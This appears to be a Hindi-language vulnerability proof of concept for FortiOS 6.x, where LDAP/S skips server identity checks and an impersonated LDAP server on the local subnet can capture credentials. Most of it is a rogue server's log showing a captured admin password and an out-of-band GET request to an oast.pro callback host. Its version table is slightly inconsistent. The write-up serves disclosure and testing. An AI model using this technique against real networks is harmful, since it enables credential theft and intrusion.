
FortiOS v6.0.x से v6.2.0 पर LDAP की डिफ़ॉल्ट कॉन्फ़िगरेशन LDAP/S के लिए सर्वर की पहचान की जाँच नहीं करती है, जिससे MITM हमले हो सकते हैं। यह PoC स्थानीय सबनेट पर एक ऐसे LDAP सर्वर को भेजे गए क्रेडेंशियल्स के पूर्ण एक्सफिल्ट्रेशन को प्रदर्शित करता है, जिसे आसानी से प्रतिरूपित किया जा सकता है।
यह प्रूफ ऑफ कॉन्सेप्ट (PoC) एक MITM (Man-In-The-Middle) हमले को प्रदर्शित करता है: FortiOS के कमजोर संस्करण को चलाने वाले FortiGate डिवाइस के स्थानीय सबनेट पर एक LDAP सर्वर का प्रतिरूपण (impersonation)।
ये संस्करण कमजोर हैं:
| संस्करण | प्रभावित | समाधान |
|---|---|---|
| FortiOS 7.0 | प्रभावित नहीं | लागू नहीं |
| FortiOS 6.0 | 6.0.3 से 6.2.0 तक | 6.2.1 या उससे ऊपर अपग्रेड करें |
PoC के लिए VMware Fusion के अंदर चल रहे FortiOS 6.2.0 का उपयोग किया गया।
[2025-10-16 22:59:47.366765] New connection from 192.168.43.24:54789
--- Request #1 ---
BIND Request:
Message ID: 1
DN: cn=admin,dc=example,dc=com
Password: ldapAdMiNPassw0rd!
-> Sent BIND Response (Success)
--- Request #2 ---
SEARCH Request:
Message ID: 2
Base DN: dc=example,dc=com
Filter:
cn
nLBkcjDTHC01.1...
-> Sent SEARCH Result Entry
-> Sent SEARCH Result Done
--- Request #3 ---
BIND Request:
Message ID: 3
DN: dc=example,dc=com
Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
🔑 CAPTURED PASSWORD: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
🔧 No scheme found — prepending https:// -> https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
📡 Attempting GET request to: https://d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
✅ GET request successful! Status code: 200
-> Sent BIND Response (Success)
--- Request #4 ---
SEARCH Request:
Message ID: 4
Base DN: dc=example,dc=com
Filter:
objectclass0memberOfprimaryG...
-> Sent SEARCH Result Entry
-> Sent SEARCH Result Done
--- Request #5 ---
[2025-10-16 22:59:49.159193] Connection closed from 192.168.43.24:54789
============================================================
SESSION SUMMARY - Captured Password: d3omljs2kel69tn1dun0m4mykgw1uafyz.oast.pro
============================================================
FortiOS v6.0.x से v6.2.0 तक LDAP की डिफ़ॉल्ट कॉन्फ़िगरेशन LDAP/S के लिए सर्वर पहचान की जाँच नहीं करती, जिससे MITM हमले होते हैं। यह PoC स्थानीय सबनेट पर एक आसानी से प्रतिरूपित किए जाने वाले LDAP सर्वर को भेजे गए क्रेडेंशियल्स के पूर्ण बहिर्निष्कासन (exfiltration) को प्रदर्शित करता है।